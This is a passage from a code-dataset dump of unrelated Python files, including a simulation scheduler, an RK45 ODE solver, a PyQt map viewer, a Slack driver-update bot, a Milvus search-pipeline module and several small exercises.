dateList]\nprint(date_str)\n","sub_path":"P2/hw2.py","file_name":"hw2.py","file_ext":"py","file_size_in_byte":6179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"39211697","text":"# Class that handles the scheduling of the simulation, i.e. when each model and agent step happens.\n\nimport numpy as np\nfrom tqdm import tqdm\n\n\nclass Scheduler:\n    def __init__(self, grid, timestep=0, iteration_callback=None):\n        \"\"\" Manages the timesteps on the circular grid\n        :param grid: the Circular grid object\n        :param timestep: time to wait between each step; only useful when visualising data. 
Should be zero otherwise\n :param iteration_callback: Function that gets called after a completed iteration.\n \"\"\"\n\n self.grid = grid\n self.timestep = timestep\n self.iteration_callback = iteration_callback\n self.started = False\n\n self.history = []\n self.timestamp = 0\n\n def start(self, dt, t_end) -> None:\n \"\"\" \n Starts the simulation \n :param dt: Timestep size\n :param t_end: end time of the simulation\n :return: None\n \"\"\"\n print(\"Starting simulation...\")\n for t in tqdm(np.arange(0, t_end, dt)):\n self.timestamp = t\n self.grid.announce_beforestep()\n self.grid.announce_afterstep()\n self.grid.announce_step()\n self.history = np.concatenate(\n (self.history, self.get_snapshot()), axis=None\n )\n\n return\n\n def get_snapshot(self) -> np.array:\n \"\"\"\n :return: array of dictionaries with all the cell states\n \"\"\"\n data = []\n for ring in self.grid.rings:\n for cell in ring.children:\n celldata = {\n \"t\": self.timestamp,\n \"id\": cell.id,\n \"age\": cell.current_age,\n \"parent_ring\": cell.parent.id,\n \"theta1\": cell.get_theta1(),\n \"theta2\": cell.get_theta2(),\n }\n data.append(celldata)\n return np.array(data)\n\n def pause(self):\n \"\"\"\n Pauses the current simulation after finishing current iteration\n \"\"\"\n self.started = False\n\n","sub_path":"code/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"575112789","text":"import webbrowser\r\n\r\n\r\nclass Movie():\r\n \"\"\"A class that holds all of our movies information.\"\"\"\r\n\r\n def __init__(self, movie_title, movie_storyline, poster_image,\r\n trailer_youtube, cast, rating, release_year):\r\n self.title = movie_title\r\n self.storyline = movie_storyline\r\n self.poster_image_url = poster_image\r\n self.trailer_youtube_url = trailer_youtube\r\n self.cast = cast # Let's add more information to our\r\n self.rating = rating # movies by adding the rating of the\r\n self.released = release_year # movie and the release year.\r\n\r\n def show_trailer(self):\r\n webbrowser.open(self.trailer_youtube_url)","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"100655989","text":"from src.utils.constants import ID, NAME, QTY, MIN_STOCK, COST, UNITS, CATEGORY\n\n\nclass Product:\n \"\"\"Concrete class for the product entity\"\"\"\n\n def __init__(self, _id, name, qty, min_stock, cost, units, category):\n self.id = _id\n self.name = name\n self.qty = qty\n self.min_stock = min_stock\n self.cost = cost\n self.units = units\n self.category = category\n\n def to_dict(self):\n \"\"\"Convert this object into a dictionary representation\"\"\"\n product = {\n ID: self.id,\n NAME: self.name,\n QTY: self.qty,\n MIN_STOCK: self.min_stock,\n COST: self.cost,\n UNITS: self.units,\n CATEGORY: self.category\n }\n return product\n\n @staticmethod\n def from_dict(data):\n \"\"\"Create an object of this type from a dictionary representation\"\"\"\n try:\n return Product(\n data[ID],\n data[NAME],\n data[QTY],\n data[MIN_STOCK],\n data[COST],\n data[UNITS],\n data[CATEGORY]\n )\n except KeyError:\n return Product(\n 0,\n data[NAME],\n data[QTY],\n data[MIN_STOCK],\n data[COST],\n data[UNITS],\n data[CATEGORY]\n )\n\n def __str__(self):\n return str(self.to_dict())\n\n def __unicode__(self):\n return 
str(self.to_dict())\n","sub_path":"src/models/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"47288996","text":"#\r\n# @lc app=leetcode.cn id=90 lang=python3\r\n#\r\n# [90] Subsets II\r\n#\r\n# https://leetcode-cn.com/problems/subsets-ii/description/\r\n#\r\n# algorithms\r\n# Medium (63.36%)\r\n# Likes:    630\r\n# Dislikes: 0\r\n# Total Accepted:    129K\r\n# Total Submissions: 203.5K\r\n# Testcase Example:  '[1,2,2]'\r\n#\r\n# Given an integer array nums that may contain duplicate elements, return all possible subsets (the power set).\r\n# \r\n# The solution set must not contain duplicate subsets. The subsets may be returned in any order.\r\n# \r\n# \r\n# Example 1:\r\n# \r\n# \r\n# Input: nums = [1,2,2]\r\n# Output: [[],[1],[1,2],[1,2,2],[2],[2,2]]\r\n# \r\n# \r\n# Example 2:\r\n# \r\n# \r\n# Input: nums = [0]\r\n# Output: [[],[0]]\r\n# \r\n# \r\n# Constraints:\r\n# \r\n# \r\n# 1 <= nums.length <= 10\r\n# -10 <= nums[i] <= 10\r\n# \r\n# \r\n#\r\n\r\n# @lc code=start\r\nfrom typing import List\r\n\r\n\r\nclass Solution:\r\n    def subsetsWithDup(self, nums: List[int]) -> List[List[int]]:\r\n        path = []\r\n        res = []\r\n        # define the dfs backtracking helper\r\n        def dfs(nums, startIndex):\r\n            res.append(path[:])\r\n            for i in range(startIndex, len(nums)):\r\n                # skip duplicates at the same tree depth (nums is sorted)\r\n                if i > startIndex and nums[i] == nums[i-1]:\r\n                    continue\r\n                path.append(nums[i])\r\n                dfs(nums, i+1)\r\n                path.pop()\r\n        nums = sorted(nums)\r\n        dfs(nums,0)\r\n        return res\r\n# @lc code=end\r\n\r\n","sub_path":"leetcode/90.子集-ii.py","file_name":"90.子集-ii.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"129897258","text":"n = int(input('Choose a number and see its factorial: '))\n\nc = n  # c is the number chosen in n\nf = 1  # f accumulates the factorial, starting from 1\n\nwhile c > 0:  # while c is greater than 0\n    print('{}'.format(c), end='')  # show the current factor\n    print(' x ' if c > 1 else ' = ', end='')  # print 'x' between factors and '=' after the last one\n    f *= c  # multiply f by c before decrementing (the original decremented first, so the final step multiplied by 0 and always printed 0)\n    c -= 1  # subtract 1 from c\nprint('{}'.format(f))  # print the factorial","sub_path":"ProjetosPython/PraticandoPython/P49-Fatorial.py","file_name":"P49-Fatorial.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"102153605","text":"filepath = 'winner.in'\n\nwith open(filepath) as fp:\n    n = int(fp.readline())\n    line = fp.readline()[0:n*2]\n    one = line.count('1')\n    two = line.count('2')\n    \n    if one > two:\n        print('Mike')\n    elif one < two:\n        print('Jack')\n    else:\n        print('Tie')\n","sub_path":"B/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"224878089","text":"# -*- coding: utf-8 -*-\nfrom openprocurement.api.utils import (\n    get_file,\n    update_file_content_type,\n    json_view,\n    context_unpack,\n    APIResource,\n)\nfrom openregistry.lots.core.utils import (\n    save_lot, oplotsresource, apply_patch,\n)\nfrom openregistry.lots.loki.validation import validate_publication_data\n\n@oplotsresource(name='loki:Lot Publications',\n                collection_path='/lots/{lot_id}/publications',\n                path='/lots/{lot_id}/publications/{publication_id}',\n                lotType='loki',\n                description=\"Lot related publications\")\nclass LotPublicationsResource(APIResource):\n\n    @json_view(permission='view_lot')\n    def collection_get(self):\n        \"\"\"Lot Publications List\"\"\"\n        
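# (sketch note) with ?all=... every stored publication is returned as-is; the default branch de-duplicates by id (the dict keeps the last revision) and sorts by dateModified.\n        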
if self.request.params.get('all', ''):\n            collection_data = [i.serialize(\"view\") for i in self.context.publications]\n        else:\n            collection_data = sorted(dict([\n                (i.id, i.serialize(\"view\"))\n                for i in self.context.publications\n            ]).values(), key=lambda i: i['dateModified'])\n        return {'data': collection_data}\n\n    @json_view(content_type=\"application/json\", permission='upload_lot_publications', validators=(validate_publication_data, ))\n    def collection_post(self):\n        \"\"\"Lot Publications Upload\"\"\"\n        publication = self.request.validated['publication']\n        self.context.publications.append(publication)\n        if save_lot(self.request):\n            self.LOGGER.info('Created lot publication {}'.format(publication.id),\n                             extra=context_unpack(self.request, {'MESSAGE_ID': 'lot_publication_create'}, {'publication_id': publication.id}))\n            self.request.response.status = 201\n            publication_route = self.request.matched_route.name.replace(\"collection_\", \"\")\n            self.request.response.headers['Location'] = self.request.current_route_url(_route_name=publication_route, publication_id=publication.id, _query={})\n        return {'data': publication.serialize(\"view\")}\n\n    @json_view(permission='view_lot')\n    def get(self):\n        \"\"\"Lot Publication Read\"\"\"\n        publication = self.request.validated['publication']\n        publication_data = publication.serialize(\"view\")\n        return {'data': publication_data}\n\n    @json_view(content_type=\"application/json\", permission='upload_lot_publications', validators=(validate_publication_data, ))\n    def patch(self):\n        \"\"\"Lot Publications Update\"\"\"\n        if apply_patch(self.request, src=self.request.context.serialize()):\n            update_file_content_type(self.request)\n            self.LOGGER.info('Updated lot publication {}'.format(self.request.context.id),\n                             extra=context_unpack(self.request, {'MESSAGE_ID': 'lot_publication_patch'}))\n        return {'data': self.request.context.serialize(\"view\")}\n","sub_path":"openregistry/lots/loki/views/lot_publication.py","file_name":"lot_publication.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"43641232","text":"import os\nimport requests\nfrom slackclient import SlackClient\nfrom pyquery import PyQuery\nimport datetime\n\n# starterbot's ID as an environment variable\nBOT_ID = os.environ.get(\"BOT_ID\")\n\n# instantiate the Slack client\nslack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))\n\ndef check_drivers():\n    pre_url = 'http://www.guru3d.com/'\n    url = 'http://www.guru3d.com/files-categories/videocards-nvidia-geforce-vista-%7C-7.html'\n    headers = {'user-agent': \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0\"}\n    forum_page = requests.get(url, headers=headers).content\n    pq = PyQuery(forum_page)\n    first_post_title = pq(\"h1\")[0]\n    driver_version = first_post_title.text_content().split('driver')[0].strip()\n    print(\"driver version: %s\" % driver_version)\n    date = pq(\".newsstoryheader\")[0].text_content().split('on:')[1].split('[')[0].strip()\n    print(date)\n    formatted_date = datetime.datetime.strptime(date, \"%m/%d/%Y %I:%M %p\")\n    date_difference = datetime.datetime.now() - formatted_date\n    seconds_difference = date_difference.seconds + date_difference.days * 86400\n    if (seconds_difference <= 1800):\n        print('New driver! Out %d minutes ago!' % (seconds_difference/60))\n        page_url = pre_url + first_post_title.getnext().getnext().find('a').get('href')\n        
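# (sketch note) 1800 s == 30 min: only a post younger than half an hour counts as new and triggers the Slack ping below.\n        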
%s :nvidia:\" % (driver_version, page_url)\n slack_client.api_call(\"chat.postMessage\", channel=\"general\", text=response, as_user=True)\n else:\n print('Existing driver. Out %d minutes ago!' % (seconds_difference/60))\n\nif __name__ == \"__main__\":\n if slack_client.rtm_connect():\n print(\"NvidiaBot connected and running!\")\n check_drivers()\n else:\n print(\"Connection failed. Invalid Slack token or bot ID?\")\n","sub_path":"check_new_drivers.py","file_name":"check_new_drivers.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"326350970","text":"class Solution:\n def distributeCandies(self, candies: int, num_people: int) -> List[int]:\n n = [0 for i in range(num_people)]\n index = 0\n while candies>0:\n n[index%num_people]+= min(candies,index+1)\n candies-=index+1\n index+=1\n return n\n \n \n","sub_path":"Day17 Distribute Candies to People.py","file_name":"Day17 Distribute Candies to People.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"267396767","text":"import numpy as np\nimport scipy as sc\nimport matplotlib.pyplot as plt\nimport math\n\nT = 50\t\t\t# Maximale Zeit\nh0 = 0.01\t\t# Start-Schrittweite\nsteps = 900000\t\t# Anzahl maximaler Schritte (so gross waehlen, dass genug Platz fuer Werte vorhanden ist)\nvar_count = 2\t\t# Anzahl der dynamischen Variablen\neps_tol = 1.e-10\t# Epsilon-Toleranz\nb_fak = 0.9\t\t# Sicherheitsfaktor\n\n# Startwerte der dynamischen Variablen\ndyn_var_start = [5000, 120]\n\n# Arrays fuer Werte der dynamischen Variablen\ndyn_var = np.zeros((var_count, steps))\nt_array = np.zeros(steps)\n\n# Startwerte einsetzen\nfor i in range(0, var_count):\n\tdyn_var[i][0] = dyn_var_start[i]\nt_array[0] = 0\n\n# Butcher-Parameter (Fehlberg)\nalpha = np.array([0, 1/4, 3/8, 12/13, 1, 1/2])\nbeta = np.array([[0, 0, 0, 0, 0, 0],\n\t[1/4, 0, 0, 0, 0, 0],\n\t[3/32, 9/32, 0, 0, 0, 0],\n\t[1932/2197, -7200/2197, 7296/2197, 0, 0, 0],\n\t[439/216, -8, 3680/513, -845/4104, 0, 0],\n\t[-8/27, 2, -3544/2565, 1859/4104, -11/40, 0]])\nc = np.array([25/216, 0, 1408/2565, 2197/4104, -1/5, 0])\nc_star = np.array([16/135, 0, 6656/12825, 28561/56430, -9/50, 2/55])\n# ..............................\n\n# k-Vektoren\nk_vec = np.zeros((var_count, 6))\n\n# Epsilon-Hilfswerte\neps_vec = np.zeros(var_count)\neps_min = 0\neps_max = 0\n\n# Vektor der h-Werte\nh_vec = np.zeros(steps)\nh_vec[0] = h0\n\n# EpsSum zum Abschaetzen des Fehlers\neps_sum = np.zeros(steps)\neps_sum[0] = 0\n\n# Funktionen f. 
def dyn_var_func1(t, x):\n\treturn 2*x[0]-0.02*x[0]*x[1]\ndef dyn_var_func2(t, x):\n\treturn 0.0002*x[0]*x[1]-0.8*x[1]\n# array of the functions above\ndyn_var_funcs = [dyn_var_func1, dyn_var_func2] #[dyn_var_func1, dyn_var_func2, ..., ]\n\n# compute the k-vector array (this is a \"var_count x 6\" matrix)\ndef k_calc(element):\n\tfor i1 in range(0, var_count): # k vector for each dynamic variable\n\t\tfor i2 in range(0, 6): # compute the 6 elements of the k vector\n\t\t\tbutch_fak = np.dot(beta[i2,:],k_vec[i1,:]) # compute the k sum\n\t\t\tk_vec[i1][i2] = dyn_var_funcs[i1](t_array[element-1]+h_vec[element-1]*alpha[i2],\n\t\t\t\tdyn_var[:,element-1]+np.inner(h_vec[element-1] * butch_fak, np.ones(var_count)))\n\t# all k-matrix entries are computed now -> next: test the step size\n\thnew_calc(element)\n\n# test and adjust the step size\ndef hnew_calc(element):\n\tfor i1 in range(0, var_count):\n\t\teps_temp = np.dot((c - c_star), k_vec[i1,:])\n\t\teps_vec[i1] = math.fabs(eps_temp) # array of all eps values\n\n\teps_max = np.amax(eps_vec)\n\tif eps_max >= eps_tol: # eps too large: reject the step\n\t\th_vec[element-1] *= b_fak*(eps_tol/eps_max)**0.2\n\t\tk_calc(element) # note: this is a recursion!\n\telse: # step size acceptable - afterwards compute the new step size\n\t\teps_min = 0\t\t\n\t\tfor k in range(0, var_count): # take the largest eps that is still below eps_tol\n\t\t\tif (eps_vec[k] <= eps_tol) and (eps_vec[k] >= eps_min):\n\t\t\t\teps_min = eps_vec[k]\n\t\tcalc_next_step(element, eps_min) # compute the next step\n\t\th_vec[element] = h_vec[element-1] * b_fak * (eps_tol/eps_min)**0.25\n\n# compute the new elements\ndef calc_next_step(element, epsmin):\t\n\tfor i1 in range(0, var_count):\n\t\tdyn_var[i1][element] = dyn_var[i1][element-1] + h_vec[element-1] * np.dot(c_star, k_vec[i1,:])\n\t\tt_array[element] = t_array[element-1] + h_vec[element-1]\n\t\teps_sum[element] = eps_sum[element-1] + epsmin\n\n\n
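# (editor's note, hedged) Classic RKF45 step control: (c - c_star)·k estimates the local 4th/5th-order error;\n# a rejected step shrinks h via b_fak*(eps_tol/eps_max)**0.2, an accepted step sets the next h with exponent 0.25.\n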
# !!! START !!!\ncounter = 0\nwhile (t_array[counter-1] <= T):\n\tcounter += 1\n\tk_calc(counter)\n# !!!!!!!!!!!!!\n\n\n# strip the unused zeros from the dyn_var arrays\ndyn_var_trimmed = np.zeros((var_count, counter))\nfor i in range(0, var_count):\n\tfor j in range(0, counter):\n\t\tdyn_var_trimmed[i][j] = dyn_var[i][j]\n\n# strip the unused zeros from the t array\nt_array_trimmed = np.zeros(counter)\nfor i in range(0, counter):\n\tt_array_trimmed[i] = t_array[i]\n\t\n# strip the unused zeros from eps_sum\neps_sum_trimmed = np.zeros(counter)\nfor i in range(0, counter):\n\teps_sum_trimmed[i] = eps_sum[i]\n\n\n# PLOTS\nfig, axes = plt.subplots(1,2)\n(ax1, ax2) = axes\n\nax1.set_title('x0 = 5000 / y0 = 120')\nax1.set_xlabel('Time t')\nax1.set_ylabel('Population x(t) / y(t)')\nax1.plot(t_array_trimmed, dyn_var_trimmed[0], 'bo')\nax1.plot(t_array_trimmed, dyn_var_trimmed[0]+eps_sum_trimmed, 'r-') # +error\nax1.plot(t_array_trimmed, dyn_var_trimmed[0]-eps_sum_trimmed, 'y-') # -error\nax1.plot(t_array_trimmed, dyn_var_trimmed[1], 'ro')\nax1.legend([\"x(t)\", \"x+error\", \"x-error\", \"y(t)\"])\n\nax2.set_title('')\nax2.set_xlabel('Population x(t)')\nax2.set_ylabel('Population y(t)')\nax2.plot(dyn_var_trimmed[0], dyn_var_trimmed[1], 'b-')\nax2.legend([\"y(x)\"])\nplt.show()\n","sub_path":"ODEs/RK45_Fehlberg.py","file_name":"RK45_Fehlberg.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"144150866","text":"import os\nimport sys\n\nimport requests\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QLabel\nfrom PyQt5.QtCore import Qt\n\nSCREEN_SIZE = [600, 450]\n\n\nclass Example(QMainWindow):\n    def __init__(self):\n        super().__init__()\n        # self.ll = \"37.530887,55.703118\"\n        self.ll = \"85.0,85.0\"\n        # self.spn = \"0.002,0.002\"\n        self.spn = \"85.0,85.0\"\n        self.l = \"map\"\n        self.initUI()\n        self.update_image()\n\n    def update_image(self):\n        self.loading.show()\n        self.getImage()\n        self.pixmap = QPixmap(self.map_file)\n        self.image.setPixmap(self.pixmap)\n        self.loading.hide()\n\n    def keyPressEvent(self, event):\n        max_spn = 85.0\n        min_spn = 0.001\n        delta_move_up_down = 85 / 180\n        delta_move_left_right = 1\n        if event.key() == Qt.Key_PageUp:\n            delta = 0.5\n            data = list(map(float, self.spn.split(',')))\n            data[0] *= (1 + delta)\n            data[1] *= (1 + delta)\n            if data[0] > max_spn:\n                data[0] = max_spn\n            if data[1] > max_spn:\n                data[1] = max_spn\n            self.spn = ','.join(list(map(str, data)))\n        elif event.key() == Qt.Key_PageDown:\n            delta = 0.5\n            data = list(map(float, self.spn.split(',')))\n            data[0] *= (1 - delta)\n            data[1] *= (1 - delta)\n            if data[0] < min_spn:\n                data[0] = min_spn\n            if data[1] < min_spn:\n                data[1] = min_spn\n            self.spn = ','.join(list(map(str, data)))\n        elif event.key() == Qt.Key_Up:\n            data = list(map(float, self.ll.split(',')))\n            spn = list(map(float, self.spn.split(',')))\n            data[1] += spn[1] * delta_move_up_down\n            if data[1] > 85:\n                data[1] = 85\n            self.ll = ','.join(list(map(str, data)))\n        elif event.key() == Qt.Key_Down:\n            data = list(map(float, self.ll.split(',')))\n            spn = list(map(float, self.spn.split(',')))\n            data[1] -= spn[1] * delta_move_up_down\n            if data[1] < -85:\n                data[1] = -85\n            self.ll = ','.join(list(map(str, data)))\n        elif event.key() == Qt.Key_Left:\n            data = list(map(float, self.ll.split(',')))\n            spn = list(map(float, self.spn.split(',')))\n            data[0] -= spn[0] * delta_move_left_right\n            if data[0] < -179:\n                data[0] += 360\n            self.ll = ','.join(list(map(str, data)))\n        
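# (sketch note) arrow keys pan by a fraction of the current span; latitude is clamped at ±85° (the Mercator limit) while longitude wraps around at ±179°.\n        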
elif event.key() == Qt.Key_Right:\n            data = list(map(float, self.ll.split(',')))\n            spn = list(map(float, self.spn.split(',')))\n            data[0] += spn[0] * delta_move_left_right\n            if data[0] > 179:\n                data[0] -= 360\n            self.ll = ','.join(list(map(str, data)))\n        else:\n            return\n\n        self.update_image()\n        print(f'spn={self.spn}, ll={self.ll}')\n\n    def getImage(self):\n        map_api_server = \"http://static-maps.yandex.ru/1.x/\"\n        map_params = {\n            \"ll\": self.ll,\n            \"spn\": self.spn,\n            \"l\": self.l\n        }\n        response = requests.get(map_api_server, params=map_params)\n\n        if not response:\n            print(\"Request failed:\")\n            print(f\"{map_api_server}?{'&'.join([f'{key}={val}' for key, val in map_params.items()])}\")\n            print(\"Http status:\", response.status_code, \"(\", response.reason, \")\")\n            sys.exit(1)\n\n        # write the received image to a file\n        self.map_file = \"map.png\"\n        with open(self.map_file, \"wb\") as file:\n            file.write(response.content)\n\n    def initUI(self):\n        self.setGeometry(100, 100, *SCREEN_SIZE)\n        self.setWindowTitle('Map display')\n\n        # the map image\n        self.image = QLabel(self)\n        self.image.move(0, 0)\n        self.image.resize(600, 450)\n\n        # the loading indicator\n        self.loading = LoadingText()\n\n    def closeEvent(self, event):\n        \"\"\"Clean up after ourselves when the form is closed\"\"\"\n        os.remove(self.map_file)\n\n\nclass LoadingText(QWidget):\n    def __init__(self):\n        super().__init__()\n        self.initUi()\n\n    def initUi(self):\n        self.setWindowTitle(\"Updating...\")\n        self.setFixedSize(300, 1)\n\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    ex = Example()\n    ex.show()\n    sys.exit(app.exec())\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"645641103","text":"# Copyright (C) 2019-2020 Zilliz. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n# or implied. See the License for the specific language governing permissions and limitations under the License.\n
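# (editorial gloss, hedged) This module implements search-pipeline CRUD on top of a DB model, plus execution:\n# configured processor/encoder operator instances are resolved and invoked via the operators client.\n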
\n\nimport logging\nimport json\nfrom typing import List\nfrom models.pipeline import Pipeline as DB\nfrom models.pipeline import insert_pipeline\nfrom models.pipeline import search_pipeline\nfrom models.pipeline import del_pipeline\nfrom common.error import PipelineCheckError\nfrom common.error import PipelineIlegalError\nfrom common.error import RPCExecError\nfrom common.error import NotExistError\nfrom common.const import OPERATOR_TYPE_ENCODER\nfrom common.const import OPERATOR_TYPE_PROCESSOR\nfrom operators.operator import all_operators\nfrom operators.operator import operator_detail\nfrom operators.client import execute, identity\nfrom storage.storage import MilvusIns\n\nlogger = logging.getLogger(__name__)\n\n\nclass Pipeline():\n    def __init__(self, name, input, output, description,\n                 processors, encoder):\n        self._pipeline_name = name\n        self._input = input\n        self._output = output\n        self._pipeline_description = description\n        self._processors = processors\n        self._encoder = encoder\n        self._description = description\n\n    @property\n    def name(self):\n        return self._pipeline_name\n\n    @property\n    def description(self):\n        return self._pipeline_description\n\n    @property\n    def input(self):\n        return self._input\n\n    @property\n    def output(self):\n        return self._output  # fix: the original returned self.output, which recursed forever\n\n    @property\n    def processors(self):\n        return self._processors\n\n    @processors.setter\n    def processors(self, processors):\n        self._processors = processors\n\n    @property\n    def encoder(self):\n        return self._encoder\n\n    @encoder.setter\n    def encoder(self, encoder):\n        self._encoder = encoder\n\n    def save(self):\n        p = DB(name=self._pipeline_name, input=self._input,\n               output=self._output, processors=json.dumps(self.processors),\n               encoder=json.dumps(self.encoder), description=self._description)\n        try:\n            insert_pipeline(p)\n        except Exception as e:\n            raise e\n        return self\n\n\ndef all_pipelines():\n    res = []\n    try:\n        pipelines = search_pipeline()\n        for p in pipelines:\n            pipe = Pipeline(name=p.Pipeline.name, input=p.Pipeline.input,\n                            output=p.Pipeline.output,\n                            description=p.Pipeline.description,\n                            processors=json.loads(p.Pipeline.processors),\n                            encoder=json.loads(p.Pipeline.encoder))\n            res.append(pipe)\n        return res\n    except Exception as e:\n        logger.error(e)\n        raise e\n\n\ndef pipeline_detail(name):\n    try:\n        p = search_pipeline(name)\n        if not p:\n            raise NotExistError(\"pipeline %s does not exist\" % name, \"\")\n        pipe = Pipeline(name=p.name, input=p.input,\n                        output=p.output,\n                        description=p.description,\n                        processors=json.loads(p.processors),\n                        encoder=json.loads(p.encoder))\n        return pipe\n    except Exception as e:\n        raise e\n\n\ndef create_pipeline(name, processors, encoder, description=None):\n    try:\n        # add encoder args check\n        # create pipeline\n        pipe = Pipeline(name=name, processors=processors, encoder=encoder,\n                        description=description, input=\"\", output=\"\")\n        if pipeline_illegal(pipe):\n            raise PipelineIlegalError(\"Pipeline illegal check error\", \"\")  # fix: was `return`, which handed back an exception instance instead of raising it\n        return pipe.save()\n    except Exception as e:\n        logger.error(e)\n        raise e\n\n\ndef delete_pipeline(name):\n    try:\n        p = del_pipeline(name)\n        if not p:\n            raise NotExistError(\"pipeline %s does not exist\" % name, \"\")\n        p = p[0]\n        pipe = Pipeline(name=p.name, input=p.input,\n                        output=p.output,\n                        description=p.description,\n                        processors=json.loads(p.processors),\n                        encoder=json.loads(p.encoder))\n        return pipe\n    except Exception as e:\n        logger.error(e)\n        raise e\n\n\ndef run_pipeline(p, **kwargs):\n    
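\"\"\"(Editorial sketch) Resolve each configured processor instance, run them in order over the input\n    url/data, then run the encoder last; intermediate steps yield metadata, the final step yields vectors.\"\"\"\n    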
todo_list = []\n if not isinstance(p, Pipeline):\n raise PipelineCheckError(\"check pipeline with error\", \"%s is not a Pipeline\" % p)\n for processor in p.processors:\n if not processor:\n continue\n op = operator_detail(processor[\"name\"])\n ins = op.inspect_instance(processor[\"instance\"])\n todo_list.append(ins)\n op = operator_detail(p.encoder[\"name\"])\n ins = op.inspect_instance(p.encoder[\"instance\"])\n todo_list.append(ins)\n\n def runner(todo_list):\n metadata, vectors = [], []\n urls = [kwargs['url']] if kwargs['url'] else []\n datas = [kwargs['data']] if kwargs['data'] else []\n try:\n for num, i in enumerate(todo_list):\n if num == len(todo_list) - 1:\n vectors, _ = execute(i, urls=urls, datas=datas)\n return vectors\n _, metadatas = execute(i, urls=urls, datas=datas)\n urls = [x.url for x in metadatas]\n datas = [x.data for x in metadatas]\n return metadata\n except Exception as e:\n raise RPCExecError(\"Execute with error\", e)\n\n try:\n return runner(todo_list)\n except Exception as e:\n logger.error(e)\n raise e\n\n\ndef test_pipeline(name, data=None, url=None):\n try:\n pipe = search_pipeline(name)\n p = Pipeline(name=pipe.name, input=pipe.input, output=pipe.output,\n description=pipe.description, processors=json.loads(pipe.processors),\n encoder=json.loads(pipe.encoder))\n return {\"result\": run_pipeline(p, data=data, url=url)}\n except Exception as e:\n raise e\n\n\ndef pipeline_illegal(pipe):\n # TODO Rewrite\n # encoder_name = encoder.get(\"name\")\n # encoder_instance_name = encoder.get(\"instance\")\n # # check operator and instance exist\n # encoder = operator_detail(encoder_name)\n # # get port and addr from runtime client\n # encoder_instance = encoder.inspect_instance(encoder_instance_name)\n # encoder_identity = identity(encoder_instance.endpoint)\n return False\n","sub_path":"search/pipeline/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":6819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"243819951","text":"import argparse\nimport logging\nlogging.basicConfig(format='%(asctime)s - %(levelname)-8s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\nfrom pyspark.sql.functions import col, coalesce, from_json, to_json, sort_array, \\\n udf, explode, to_date, row_number, lit, concat_ws, \\\n date_sub, when, lag, current_timestamp, concat, date_add\nfrom pyspark.sql.types import StructType, BooleanType, StringType, TimestampType, \\\n StructField, ArrayType, DateType, IntegerType\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.window import Window\nimport sys\nsys.path.append('/opt/bone/analytics/python-lib')\nfrom hashpipe import inject\nrelationship_ranking = ArrayType(StructType([\n StructField('relationship', StringType()),\n StructField('rank', IntegerType())\n]))\n\nsourcesys_ranking = ArrayType(StructType([\n StructField('sourceSystem', StringType()),\n StructField('rank', IntegerType())\n]))\n\nranking_fields = StructType([\n StructField('relationshipRanking', relationship_ranking),\n StructField('eligibilitySourceSys', sourcesys_ranking)\n])\n\nutility_fields = ArrayType(StructType([\n StructField('field', StringType()),\n StructField('name', StringType()),\n StructField('eligibilitySource', StringType()),\n StructField('facetsFieldName', StringType())\n]))\n\ncapabilities = ArrayType(StructType([\n StructField('name', StringType()),\n StructField('startDate', TimestampType()),\n StructField('endDate', 
